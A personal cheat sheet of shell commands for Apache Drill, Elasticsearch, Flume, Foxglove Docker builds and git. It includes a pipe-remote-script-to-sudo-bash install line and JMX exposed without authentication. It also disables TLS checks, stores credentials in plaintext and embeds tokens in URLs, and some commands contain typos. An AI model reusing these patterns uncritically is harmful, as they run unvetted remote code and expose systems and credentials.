curl --insecure -X GET https://mapr-web.vantage.zur:21103/status

# obtain cookie from server
curl -H "Content-Type: application/x-www-form-urlencoded" \
  -k -c cookies.txt -s \
  -d "j_username=$DRILL_USER" \
  --data-urlencode "j_password=$DRILL_PASS" \
  https://mapr-web.vantage.zur:21103/j_security_check

# obtain version
curl -k -b cookies.txt -X POST \
-H "Content-Type: application/json" \
-w "response-code: %{http_code}\n" \
-d '{"queryType":"SQL", "query": "select * from sys.version"}' \
https://mapr-web.vantage.zur:21103/query.json


# SQL request
curl -k -b cookies.txt -X POST \
-H "Content-Type: application/json" \
-w "response-code: %{http_code}\n" \
-d '{"queryType":"SQL", "query":  "select loggerTimestamp, key, `value` from dfs.`/mapr/dp.zurich/some-file-on-cluster` limit 10"}' \
https://mapr-web.vantage.zur:21103/query.json

drill cli

!set outputformat 'csv'
!record '/user/user01/query_output.csv'
show databases
!record

drill java

src code

/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.222/jre/bin/java \
-Ddrill.customAuthFactories=org.apache.drill.exec.rpc.security.maprsasl.MapRSaslFactory \
-Djava.security.auth.login.config=/opt/mapr/conf/mapr.login.conf \
-Dzookeeper.sasl.client=false \
-Dlog.path=/opt/mapr/drill/drill-1.14.0/logs/sqlline.log \
-Dlog.query.path=/opt/mapr/drill/drill-1.14.0/logs/sqlline_queries/data_api-s_sqlline_queries.json \
-cp /opt/mapr/drill/drill-1.14.0/conf:/opt/mapr/drill/drill-1.14.0/jars/*:/opt/mapr/drill/drill-1.14.0/jars/ext/*:/opt/mapr/drill/drill-1.14.0/jars/3rdparty/*:/opt/mapr/drill/drill-1.14.0/jars/classb/*:/opt/mapr/drill/drill-1.14.0/jars/3rdparty/linux/*:drill_jdbc-1.0-SNAPSHOT.jar \
DrillCollaboration

drill errors

Caused by: java.lang.IllegalStateException: No active Drillbit endpoint found from ZooKeeper. Check connection parameters?
[MapR][DrillJDBCDriver](500150) Error setting/closing connection:
# check your Zookeeper host & cluster ID
ZOOKEEPER_HOST=zurpmtjp03.ddp.com:5181,zurpmtjp04.ddp.com:5181
DRILL_CLUSTER_ID=dp_staging_zur-drillbits
/opt/mapr/drill/drill-1.16.0/bin/sqlline -u "jdbc:drill:zk=${ZOOKEEPER_HOST}/drill/${CLUSTER_ID};auth=MAPRSASL"

drill special commands

increasing amount of parallel processing threads

set planner.width.max_per_node=10;

show errors in log

ALTER SESSION SET `exec.errors.verbose`=true;

sql examples

select columns[0], columns[1] from s3.`sample.csv`

Elasticsearch cheat sheet

rest api documentation
examples
examples

installation

curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update && sudo apt install elasticsearch
sudo systemctl start elasticsearch
curl -X GET 'http://localhost:9200'

collaboration

# common part
ELASTIC_HOST=https://elasticsearch-label-search-prod.apps.vantage.org
INDEX_NAME=ubs-single-autolabel

check connection

# version info
curl -X GET $ELASTIC_HOST

# health check
curl -H "Authorization: Bearer $TOKEN" -X GET $ELASTIC_HOST/_cluster/health?pretty=true
curl -X GET $ELASTIC_HOST/_cluster/health?pretty=true
curl -X GET $ELASTIC_HOST/_cluster/health?pretty=true&level=shards
curl -X GET $ELASTIC_HOST/$INDEX_NAME

check user

curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/_security/user/_privileges
curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/_security/user
curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/_security/user/$USER_ELASTIC

obtain bearer token

curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/token

index

create index
mapping
Info: if your index or id has space ( special symbol ) you should replace it with %20 ( http escape )

index info

# all indexes
curl -X GET $ELASTIC_HOST/_cat/indices | grep ubs | grep label
# count records by index
curl -X GET $ELASTIC_HOST/_cat/count/$INDEX_NAME

create index from file

curl -X POST $ELASTIC_HOST/$INDEX_NAME/_mapping \
-H 'Content-Type: application/json' \
-d @labels_mappings.json

create index inline

# get index
curl -s --user "$SEARCH_USER:$SEARCH_PASSWORD" -X GET $ELASTIC_HOST/$ELASTIC_INDEX > file_with_index.json

# for using just have read index, pls remove next lines:
# {"index_name": {"aliases": {}, "mappings": {  # and last } 
# settings.index.provided_name
# settings.index.creation_date
# settings.index.uuid
# settings.index.version

# create index
json_mappings=`cat file_with_index.json`
curl -X PUT $ELASTIC_HOST/$INDEX_NAME -H 'Content-Type: application/json' \
-d @- << EOF
{
	"mappings": $json_mappings,
	"settings" : {
        "index" : {
            "number_of_shards" : 1,
            "number_of_replicas" : 0
        }
    }
}
EOF

Index creation Dynamic type creation

curl --insecure -s --user "$ELK_USER:$ELK_PASSWORD" -X PUT $ELASTIC_HOST/$INDEX_NAME -H 'Content-Type: application/json' --data @- << EOF
{
    "settings": {
        "index": {
            "number_of_shards": "3",
                "auto_expand_replicas": "false",
                "number_of_replicas": "2"
            }
        }
}

curl --insecure -s --user ${ELK_USER}:${ELK_PASSWORD} -X PUT ${ELASTIC_HOST}/${ELASTIC_INDEX}/_mapping/${DYNAMIC_TYPE_NAME}?include_type_name=true -H 'Content-Type: application/json' -d @- << EOF
{
    "label": {
        "properties": {
            "controlDate": {
                "type": "date"
            },
            "roadType": {
                "type": "keyword"
            },
            "nameOfProject": {
                "type": "keyword"
            },
        }
    }
}
EOF

update index

curl -X PUT -s --user "$SEARCH_USER:$SEARCH_PASSWORD" $ELASTIC_HOST/$ELASTIC_INDEX/_mapping
{
	"_source": {
                              "excludes": [
                                            "id"
                              ]
               },
               "properties": {
                              "mytags": {
                                            "type": "flattened"
                              }
               }
}

delete index

curl -s --user "$SEARCH_USER:$SEARCH_PASSWORD" -X GET $ELASTIC_HOST/$ELASTIC_INDEX > file_with_index.json

or it is better without types specification:

{
        "settings": {
            "index": {
                "number_of_shards": "5",
                "auto_expand_replicas": "false",
                "number_of_replicas": "2"
            }
        }
}
# query search in the whole instance 
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/_search?q=sessionId:$SESSION_ID&pretty"
# query search in index 
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_search?q=sessionId:0f0062a6-e45b-4c5b-b80c-099db65edd20&pretty"
# query select first records from index
curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_search?pretty" -d @- <<EOF
{
  "size": 1,
  "query": {
    "match_all": {}
  }
}
EOF
 
# get by id
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/_doc/$DOC_ID

PROPERTY_XPATH=ship.distance
# inline query to ELK 
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/_search?q=sessionId:${SESSION_ID}&size=10000&pretty
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/_search?q=$PROPERTY_XPATH>100&pretty=true
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/_search?q=$PROPERTY_XPATH:>100&pretty=true
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/_search?q=$PROPERTY_XPATH>100&pretty=true

# query from external file
echo '{"query": {"match" : {"sessionId" : "a8b8-0174df8a3b3d"}}}' > request.json
echo '{"query": { "range" : {"ship.distance": {"gte": 100}}}}' > request.json
curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD -d @request.json "$ELASTIC_HOST/$ELASTIC_INDEX/_search"

# elastic complex query
curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$INDEX_NAME/_search" \
-d @- << EOF
{ "size":"10000",
  "query": {"bool": { "must": [ {"match": { "property1":"5504806" } } ] } },
  "_source":{"includes":["property1","property2","property3"],"excludes":["property4","property5"]}, 
  "sort": [
        { "property1": { "order": "desc", "unmapped_type":"long" }},
        { "property2": { "order": "desc", "unmapped_type":"keyword" }},
        { "property3": { "order": "desc", "unmapped_type":"long" }}
    ]}
EOF

insert record

curl -X POST -H 'Content-Type: application/json' --data @test-example.json  -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/label

update record

curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_update/${DOC_ID}" -d @- <<EOF
{
  "doc": {
    "property_1": [
      "true"
    ]
  }
}
EOF

remove records delete records

curl -X PUT $ELASTIC_HOST/$INDEX_NAME/_delete_by_query' -H 'Content-Type: application/json' \
-d @- << EOF
{
    "query": {
        "term": {
            "sessionId.keyword": {
                "value": "8a140c23-420c-3bf0a285",
                "boost": 1.0
            }
        }
    }
}
EOF

remove all records from index

curl -X POST --insecure -s --user $USER:$PASSWORD $ELASTIC_HOST/$INDEX_NAME/_delete_by_query  -H 'Content-Type: application/json' -d '{
    "query": { "match_all": {} }
}'

curl -X POST --insecure -s --user $USER:$PASSWORD $ELASTIC_HOST/$INDEX_NAME/_delete_by_query -H 'Content-Type: application/json' -d @- << EOF
{
    "query": {
        "match": {
            "_id": "_all"
        }
    }
}
EOF

backup snapshot save load index

Exceptions

org.elasticsearch.hadoop.rest.EsHadoopRemoteException: illegal_argument_exception: Can't merge because of conflicts: [Cannot update excludes setting for [_source]]

check your index & type - something wrong with creation

Flume cheat sheet

Architecture

documentation contains from three tier:

  • Agent tier has Flume agent installed agent is sending data to Collect tier
  • Collector tier aggregate the data push data to Storage tier
  • Storage tier

Each tier has

  • Source
  • Sink
  • Channel between them

Source and Sink used Avro ( Remote procedure call and serialization framework )

Interceptors can be configured for simple data processing


example of the configuration

#
# bin/flume-ng agent -name agent_1 -c conf -f conf/flume-conf-file-log.properties -Dflume.root.logger=INFO,console
#

# aliases for layers
agent_1.sources = folderSource
agent_1.channels = memoryChannel
agent_1.sinks = loggerSink


# layers description
agent_1.sources.folderSource.type = spooldir
agent_1.sources.folderSource.poolDelay = 500 
agent_1.sources.folderSource.spoolDir = /home/technik/temp/flume-example/source
agent_1.sources.folderSource.fileHeader = true
agent_1.sources.folderSource.batchSize=50
agent_1.sources.folderSource.channels = memoryChannel
#          ^   ^
#         |     |
#        |       |
#       | channel |
#        |       |
#         |     |
#          V   V
agent_1.sinks.loggerSink.channel = memoryChannel
agent_1.sinks.loggerSink.type = logger
agent_1.sinks.loggerSink.batch-size=50

# description of channel between Source and Sink
agent_1.channels.memoryChannel.type = memory
agent_1.channels.memoryChannel.capacity = 100



# ---------------------------------------------
# aliases for layers
agent_2.sources = pythonScriptExample
agent_2.channels = memoryChannel
agent_2.sinks = loggerSink

#import time
#if __name__=="__main__":
#	counter = 0
#	# for _ in range (10):
#	while True:
#		time.sleep(0.1)
#		print("next value is: "+str(counter))
#		counter = counter + 1

agent_2.sources.pythonScriptExample.type = exec
agent_2.sources.pythonScriptExample.batchSize = 1
agent_2.sources.pythonScriptExample.batchTimeout = 1
agent_2.sources.pythonScriptExample.command = python /home/technik/temp/flume-example/seq-gen.py
agent_2.sources.pythonScriptExample.channels = memoryChannel
#          ^   ^
#         |     |
#        |       |
#       | channel |
#        |       |
#         |     |
#          V   V
agent_2.sink s.loggerSink.channel = memoryChannel
agent_2.sinks.loggerSink.type = logger
agent_2.sinks.loggerSink.batch-size=500

# description of channel between Source and Sink
agent_2.channels.memoryChannel.type = memory
agent_2.channels.memoryChannel.capacity = 100

interceptor example

agent_2.interceptors = myCustomInterceptor
# full path to class, compiled jar should be placed into ./lib
agent_2.interceptors.type=MyInterceptor
import java.util.List;

import org.apache.flume.Context;
import org.apache.flume.Event;
import org.apache.flume.interceptor.Interceptor;

public class MyInterceptor implements Interceptor {

    @Override
    public void close()
    {

    }

    @Override
    public void initialize()
    {

    }

    @Override
    public Event intercept(Event event)
    {
        byte[] eventBody = event.getBody();
        System.out.println("next event >>> "+eventBody);
        // event.setBody(modifiedEvent);
        return event;
    }

    @Override
    public List<Event> intercept(List<Event> events)
    {
        for (Event event : events){

            intercept(event);
        }

        return events;
    }

    public static class Builder implements Interceptor.Builder
    {
        @Override
        public void configure(Context context) {
        }

        @Override
        public Interceptor build() {
            return new MyInterceptor();
        }
    }
}

change JVM properties, remove debug example

change JAVA_OPTS variable into file (line:225) bin/flume-ng

JAVA_OPTS="-Dcom.sun.management.jmxremote
-Dcom.sun.management.jmxremote.port=4159
-Dcom.sun.management.jmxremote.authenticate=false
-Dcom.sun.management.jmxremote.ssl=false"

clone repo

git clone --depth 1 https://github.com/foxglove/studio
# Syntax Error: Unexpected identifier
# (function (exports, require, module, __filename, __dirname) { version https://git-lfs.github.com/spec/v1
cd studio
git lfs pull

local run

NODE_VERSION=16.15.0
docker run --volume $PWD:/app -it node:$NODE_VERSION /bin/bash
cd /app
# node --version
corepack enable
yarn install --immutable
yarn run web:build:prod

docker

local build

build container locally

FOXGLOVE_IMAGE_NAME=foxglove-local
docker build -t $FOXGLOVE_IMAGE_NAME .
docker save --output $FOXGLOVE_IMAGE_NAME.tar $FOXGLOVE_IMAGE_NAME:latest
# docker save --output $FOXGLOVE_IMAGE_NAME-cors.tar $FOXGLOVE_IMAGE_NAME:cors
docker load -i {filename of archive}

build container locally and use CORS for the application

FOXGLOVE_IMAGE_NAME=foxglove-local
FOXGLOVE_CADDY_CONF=caddy-cors.conf
echo ':8080
root * /src
file_server browse

# https://caddyserver.com/docs/caddyfile/directives/header
header Access-Control-Allow-Origin "*"

header { 
  Access-Control-Allow-Origin "*"
  Access-Control-Allow-Methods "GET, POST, PUT"
  Access-Control-Allow-Headers "Content-Type"
}' > $FOXGLOVE_CADDY_CONF

# check execution
# docker run  --entrypoint="" --publish 9090:8080 -v `pwd`:/localdata -v `pwd`/caddy-cors.conf:/etc/caddy/Caddyfile $FOXGLOVE_IMAGE_NAME caddy run --config /etc/caddy/Caddyfile --adapter caddyfile

FOXGLOVE_DOCKER_CORS=Dockerfile-cors
echo "FROM foxglove-local
COPY $FOXGLOVE_CADDY_CONF /etc/caddy/Caddyfile
WORKDIR /src
EXPOSE 8080
CMD [\"caddy\",\"run\",\"--config\",\"/etc/caddy/Caddyfile\",\"--adapter\",\"caddyfile\"]" > $FOXGLOVE_DOCKER_CORS

docker build -t $FOXGLOVE_IMAGE_NAME:cors -f $FOXGLOVE_DOCKER_CORS .

docker run --publish 9090:8080 $FOXGLOVE_IMAGE_NAME:cors

GEO

location and spatial position

formal language for describing geoinformation & spatial data

git cheat sheet

public services

cheat sheet collection

branching strategies:

  • Release branching

    release manager create branch "release" at the end merge it back...

  • Feature branching

    goes with "feature-toggle" ( to decrease risk after merging ) - per feature

  • Task branching ( git flow )

useful links collection

git autocomplete

# curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-completion.bash -o ~/.git-completion.bash
# .bashrc
if [ -f ~/.git-completion.bash ]; then
  export GIT_COMPLETION_CHECKOUT_NO_GUESS=0
  export GIT_COMPLETION_SHOW_ALL_COMMANDS=1
  export GIT_COMPLETION_SHOW_ALL=1
  source ~/.git-completion.bash
fi

debug flag, verbose output of commands, output debug

export GIT_TRACE=1
export GIT_TRACE=1
export GIT_CURL_VERBOSE=1

clean working tree remove untracked files

git clean --dry-run
git clean -f -d
# remove all remote non-used branches
git remote prune origin

restore

git reset --hard

restore local branch like remote one

git reset --hard origin/master

restore local branch with saving all the work

# save work to staging
git reset --soft origin/master
# save work to working dir
git reset --mixed HEAD~2

restore removed file, restore deleted file, find removed file, show removed file

# find full path to the file 
file_name="integration_test.sh.j2"
git log --diff-filter=D --name-only | grep $file_name

# find last log messages 
full_path="ansible/roles/data-ingestion/templates/integration_test.sh.j2"
git log -2 --name-only -- $full_path

second_log_commit="99994ccef3dbb86c713a44815ab5ffa"

# restore file from specific commit
git checkout $second_log_commit -- $full_path
# show removed file 
git show $second_log_commit:$full_path

remove last commit and put HEAD to previous one

git reset --hard HEAD~1

checkout with tracking

git checkout -t origin/develop

new branch from stash

git stash branch $BRANCH_NAME stash@{3}

show removed remotely

git remote prone origin

delete local branch, remove branch, remove local branch

git branch -d release-6.9.0
git branch --delete release-6.9.0

# delete with force - for non-merged branches
git branch -D origin/release/2018.05.00.12-test
# the same as
git branch -d -f release-6.9.0
git branch --delete --force origin/release/2018.05.00.12-test

# branch my-branch-name not found
git push origin --delete my-branch-name

delete remote branch, remove remote, remove remote branch

git push origin --delete release/2018.05.00.12-test

remove branches, delete branches that exist locally only ( not remotely ), cleanup local repo

git gc --prune=now
git fetch --prune

delete local branches that was(were) merged to master ( and not have 'in-progress' marker )

git branch --merged | egrep -v "(^\*|master|in-progress)" | xargs git branch -d

remove commit, remove wrong commit

commit1=10141d299ac14cdadaca4dd586195309020
commit2=b6f2f57a82810948eeb4b7e7676e031a634 # should be removed and not important
commit3=be82bf6ad93c8154b68fe2199bc3e52dd69

current_branch=my_branch
current_branch_ghost=my_branch_2

git checkout $commit1
git checkout -b $current_branch_ghost
git cherry-pick $commit3
git push --force origin HEAD:$current_branch
git reset --hard origin/$current_branch
git branch -d $current_branch_ghost

squash commit, replace batch of commits, shrink commits

interactive rebase

git checkout my_branch
# take a look into your local changes, for instance we are going to squeeze 4 commits
git reset --soft HEAD~4
# in case of having external changes and compress commits: git rebase --interactive HEAD~4

git commit # your files should be staged before
git push --force-with-lease origin my_branch

check hash-code of the branch, show commit hash code

git rev-parse "remotes/origin/release-6.0.0"

print current hashcode commit hash last commit hash, custom log output

git rev-parse HEAD
git log -n 1 --pretty=format:'%h' > /tmp/gitHash.txt
# print author of the last commit
git log -1 remotes/origin/patch-1 --pretty=format:'%an'

print branch name by hashcode to branch name show named branches branchname find branch by hash

git ls-remote | grep <hashcode>
# answer will be like:          <hashcode>        <branch name>
# ada7648394793cfd781038f88993a5d533d4cdfdf        refs/heads/release-dataapi-13.0.2

or

git branch --all --contains ada764839

print branch hash code by name branch hash branch head hash

git rev-parse remotes/origin/release-data-api-13.3

check all branches for certain commit ( is commit in branch, is branch contains commit ), commit include in

git branch --all --contains 0ff27c79738a6ed718baae3e18c74ba87f16a314
git branch --all --merged 0ff27c79738a6ed718baae3e18c74ba87f16a314
# if branch in another branch
git branch --all --contains | grep {name-of-the-branch}

is commit included in another, commit before, commit after, if commit in branch

HASH='222333111'
BRANCH_NAME='release/7.4'
git merge-base --is-ancestor $HASH $BRANCH_NAME; if [[ 1 -eq "$?" ]]; then echo "NOT included"; else echo "included"; fi

check log by hash, message by hash

git log -1 0ff27c79738a6ed718baae3e18c74ba87f16a314

check last commits for specific branch, last commits in branch

git log -5 develop

check last commits for subfolder, check last commits for author, last commit in folder

git log -10 --author "Frank Newman" -- my-sub-folder-in-repo

get last versions of the file, get file history as snapshots

FILE_PATH=./1.md
git log -n 20 --pretty=format:"%h" -- $FILE_PATH | xargs -I{} git show {} -- $FILE_PATH > out.txt

log pretty print log oneline

git relog -5

check files only for last commits

git log -5 develop --name-only

check last commits by author, commits from all branches

git log -10 --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset%n' --all --author "Cherkashyn"

list of authors, list of users, list of all users

git shortlog -sne --all

list of files by author, list changed files

git whatchanged --author="Cherkashyn" --name-only 

often changes by author, log files log with files

git log --author="Cherkashyn" --name-status --diff-filter=M | grep "^M" | sort | uniq -c | sort -rh

commit show files, files by commit

git diff-tree --no-commit-id --name-only -r ec3772

commit diff, show changes by commit, commit changes

git diff ec3772~ ec3772
git diff ec3772~..ec3772

apply diff apply patch

git diff ec3772~..ec3772 > patch.diff
git apply patch.diff

pretty log with tree

git log --all --graph --decorate --oneline --simplify-by-decoration

git log message search commit message search commit search message

git log | grep -i jwt

git log --all --grep='jwt'
git log --name-only  --grep='XVIZ instance'
git log -g --grep='jwt'

show no merged branches

git branch --no-merged

show branches with commits

git show-branch
git show-branch -r

checkout branch locally and track it

git checkout -t remotes/origin/release

show file from another branch, show file by branch

BRANCH_NAME=feature_1234
FILE_NAME=src/main/java/EnterPoint.java
git show $BRANCH_NAME:$FILE_NAME

copy file from another branch

git checkout experiment -- deployment/connection_pool.py                                 
git checkout origin/develop datastorage/mysql/scripts/_write_ddl.sh
# print to stdout
git show origin/develop:datastorage/mysql/scripts/_write_ddl.sh > _write_ddl.sh

git add

git add --patch
git add --interactive

git mark file unchanged skip file

git update-index --assume-unchanged path/to/file

set username, global settings

git config --global user.name "vitalii cherkashyn"
git config --global user.email [email protected]
git config --global --list

or

# git config --global --edit
[user]
   name=Vitalii Cherkashyn
   email[email protected]

default editor, set editor

git config --global core.editor "vim"

avoid to enter login/password

git config --global credential.helper store

after first typing login/password it will be stored in

vim ~/.git-credentials

revert all previous changes with "credential.helper"

git config --system --unset credential.helper
git config --global --unset credential.helper

git config mergetool

git config --global merge.tool meld
git config --global mergetool.meld.path /usr/bin/meld

git config for aws code commit

[credential]
	helper = "!aws --profile 'my_aws_profile' codecommit credential-helper $@"
	UseHttpPath = true

show all branches merged into specified

git branch --all --merged "release" --verbose
git branch --all --no-merged "release" --verbose
git branch -vv

difference between two commits ( diff between branches )

git diff --name-status develop release-6.0.0
git cherry develop release-6.0.0

difference between branches for file ( diff between branches, compare branches )

git diff develop..master -- myfile.cs

github difference between two branches https://github.com/cherkavi/management/compare/release-4.0.6...release-4.0.7

difference between branch and current file ( compare file with file in branch )

git diff master -- myfile.cs

difference between commited and staged

git diff --staged

difference between two branches, list of commits list commits, messages list of messages between two commits

git rev-list master..search-client-solr
# by author
git rev-list --author="Vitalii Cherkashyn" item-598233..item-530201
# list of files that were changed
git show --name-only --oneline `git rev-list --author="Vitalii Cherkashyn" item-598233..item-530201`
#  list of commits between two branches 
git show --name-only --oneline `git rev-list d3ef784e62fdac97528a9f458b2e583ceee0ba3d..eec5683ed0fa5c16e930cd7579e32fc0af268191`

list of commits between two tags

# git tag --list
start_tag='1.0.13'
end_tag='1.1.2'
start_commit=$(git show-ref --hash $start_tag )
end_commit=$(git show-ref --hash $end_tag )
git show --name-only --oneline `git rev-list $start_commit..$end_commit`

all commits from tag till now

start_tag='1.1.2'
start_commit=$(git show-ref --hash $start_tag )
end_commit=$(git log -n 1 --pretty=format:'%H')
git show --name-only --oneline `git rev-list $start_commit..$end_commit`

difference for log changes, diff log, log diff

git log -1 --patch 
git log -1 --patch -- path/to/controller_email.py

copying from another branch, copy file branch

branch_source="master"
branch_dest="feature-2121"
file_name="src/libs/service/message_encoding.py"

# check
git diff $branch_dest..$branch_source $file_name
# apply 
git checkout $branch_source -- $file_name
# check 
git diff $branch_source $file_name

tags

create tag

git tag -a $newVersion -m 'deployment_jenkins_job' 

push tags only

git push --tags $remoteUrl

show tags

# show current tags show tags for current commit
git show
git describe --tags
git describe


# fetch tags
git fetch --all --tags -prune

# list of all tags list tag list
git tag
git tag --list
git show-ref --tags

# tag checkout tag
git tags/1.0.13

show tag hash

git show-ref -s 1.1.2

remove tag delete tag delete

# remove remote
git push --delete origin 1.1.0
git push origin :refs/tags/1.1.0
git fetch --all --tags -prune

# or remove remote
git push --delete origin 1.2.1

# remove local 
git tag -d 1.1.0
git push origin :refs/tags/1.1.0

conflict files, show conflicts

git diff --name-only --diff-filter=U

conflict file apply remote changes

git checkout --theirs path/to/file

git fetch

git fetch --all --prune

find by comment

git log --all --grep "BCM-642"

find by diff source, find through all text changes in repo, full text search with grep

git grep '^test$'
# test against all branches
git grep -e '^test$' $(git rev-list --all)

current comment

git rev-parse HEAD

find file into log

git log --all -- "**db-update.py"
git log --all -- db-scripts/src/main/python/db-diff/db-update.py

history of file, file changes file authors file log file history file versions

git log path/to/file
git log -p -- path/to/file

files in commit

git diff-tree --no-commit-id --name-only -r 6dee1f44f56cdaa673bbfc3a76213dec48ecc983

difference between current state and remote branch

git fetch --all
git diff HEAD..origin/develop

show changes into file only

git show 143243a3754c51b16c24a2edcac4bcb32cf0a37d -- db-scripts/src/main/python/db-diff/db-update.py

show changes by commit, commit changes

git diff {hash}~ {hash}

git cherry pick without commit, just copy changes from another branch

git cherry-pick -n {commit-hash}

git cherry pick with original commit message cherry pick tracking cherry pick original hash

git cherry-pick -x <commit hash>

git cherry pick, git cherry-pick conflict

# in case of merge conflict during cherry-pick
git cherry-pick --continue
git cherry-pick --abort
git cherry-pick --skip
# !!! don't use "git commit" 

git new branch from detached head

git checkout <hash code>
git cherry-pick <hash code2>
git switch -c <new branch name>

git revert commit

git revert <commit>

git revert message for commit

git commit --amend -m "<new mawsessage>"

git show author of the commit, log commit, show commits only

git log --pretty=format:"%h - %an, %ar : %s" <commit SHA> -1

show author, blame, annotation, line editor, show editor

git blame path/to/file
git blame path/to/file | grep search_line
git blame -CM -L 1,5 path/to/file/parameters.py

git into different repository, different folder, another folder, not current directory, another home

git --git-dir=C:\project\horus\.git  --work-tree=C:\project\horus  branch --all
find . -name ".git" -maxdepth 2 | while read each_file
do
   echo $each_file
   git --git-dir=$each_file --work-tree=`dirname $each_file` status
done

show remote url

git remote -v
git ls-remote 
git ls-remote --heads

connect to existing repo

PATH_TO_FOLDER=/home/projects/bash-example

# remote set
git remote add local-hdd file://${PATH_TO_FOLDER}/.git
# commit all files 
git add *; git commit --message 'add all files to git'

# set tracking branch
git branch --set-upstream-to=local-hdd/master master

# avoid to have "refusing to merge unrelated histories"
git fetch --all
git merge master --allow-unrelated-histories
# merge all conflicts
# in original folder move to another branch for avoiding: branch is currently checked out
git push local-hdd HEAD:master

# go to origin folder
cd $PATH_TO_FOLDER
git reset --soft origin/master 
git diff 

using authentication token personal access token, git remote set, git set remote

example of using github.com

# Settings -> Developer settings -> Personal access tokens
# https://github.com/settings/apps
git remote set-url origin https://$GIT_TOKEN@github.com/cherkavi/python-utilitites.git

# in case of Error: no such remote 
git remote add origin https://$GIT_TOKEN@github.com/cherkavi/python-utilitites.git
# in case of asking username & password - check URL, https prefix, name of the repo.... 
# in case of existing origin, when you add next remote - change name origin to something else like 'origin-gitlab'/'origin-github'

git remote add bitbucket https://[email protected]/cherkavi/python-utilitites.git
git pull bitbucket master --allow-unrelated-histories
function git-token-update(){
    remote_url=`git config --get remote.origin.url`
    github_part=$(echo "$remote_url" | sed 's/.*github.com\///')
    # echo "https://[email protected]/$github_part"
    git remote set-url origin "https://$GIT_TOKEN@github.com/$github_part"
}

remove old password-access approach

git remote set-url --delete origin https://github.com/cherkavi/python-utilitites.git

change remote url

git remote set-url origin [email protected]:adp/management.git

git clone via https

# username - token
# password - empty string
git clone               https://$GIT_TOKEN@cc-github.group.net/swh/management.git
git clone        https://oauth2:$GIT_TOKEN@cc-github.group.net/swh/management.git
git clone https://$GIT_TOKEN:[email protected]/swh/management.git

git push via ssh git ssh

git commmit -am 'hello my commit message'
GIT_SSH_COMMAND="ssh -i $key"
git push

issue with removing files, issue with restoring files, can't restore file, can't remove file

git rm --cached -r .
git reset --hard origin/master

clone operation under the hood

if during the access ( clone, pull ) issue appear:

fatal: unable to access 'http://localhost:3000/vitalii/sensor-yaml.git/': The requested URL returned error: 407

or

fatal: unable to access 'http://localhost:3000/vitalii/sensor-yaml.git/': The requested URL returned error: 503

use next command to 'simulate' cloning

git clone http://localhost:3000/vitalii/sensor-yaml.git
< equals >
wget http://localhost:3000/vitalii/sensor-yaml.git/info/refs?service=git-upload-pack

clone only files without history, download code copy repo shallow copy

git clone --depth 1 https://github.com/kubernetes/minikube

download single file from repo

git archive --remote=ssh://https://github.com/cherkavi/cheat-sheet HEAD jenkins.md

update remote branches, when you see not existing remote branches

git remote update origin --prune

worktree

worktree it is a hard copy of existing repository but in another folder all worktrees are connected

# list of all existing wortrees
git worktree list

# add new worktree list
git worktree add $PATH_TO_WORKTREE $EXISTING_BRANCH

# add new worktree with checkout to new branch
git worktree add -b $BRANCH_NEW $PATH_TO_WORKTREE

# remove existing worktree, remove link from repo
git worktree remove $PATH_TO_WORKTREE
git worktree prune

package update

echo 'deb http://http.debian.net/debian wheezy-backports main' > /etc/apt/sources.list.d/wheezy-backports-main.list
curl -s https://packagecloud.io/install/repositories/github/git-lfs/script.deb.sh | sudo bash

tool installation

sudo apt-get install git-lfs
git lfs install
git lfs pull

if you are using SSH access to git, you should specify http credentials ( lfs is using http access ), to avoid possible errors: "Service Unavailable...", "Smudge error...", "Error downloading object"

git config --global credential.helper store

file .gitconfig will have next section

[credential]
        helper = store

file ~/.git-credentials ( default from previous command ) should contains your http(s) credentials

https://username:[email protected]
https://username:[email protected]

git lfs proxy

be aware about upper case for environment variables

NO_PROXY=localhost,127.0.0.1,.localdomain,.advantage.org
HTTP_PROXY=muc.proxy
HTTPS_PROXY=muc.proxy

git lfs check

git lfs env
git lfs status

issue with git lfs

Encountered 1 file(s) that should have been pointers, but weren't:
git lfs migrate import --no-rewrite path-to-file

git lfs add file

git lfs track "*.psd"
# check tracking 
cat .gitattributes | grep psd

check tracking changes in file:

git add .gitattributes

create local repo in filesystem

# create bare repo file:///home/projects/bmw/temp/repo
# for avoiding: error: failed to push some refs to 
mkdir /home/projects/bmw/temp/repo
cd /home/projects/bmw/temp/repo
git init --bare
# or git config --bool core.bare true

# clone to copy #1
mkdir /home/projects/bmw/temp/repo2
cd /home/projects/bmw/temp/repo2
git clone file:///home/projects/bmw/temp/repo

# clone to copy #1
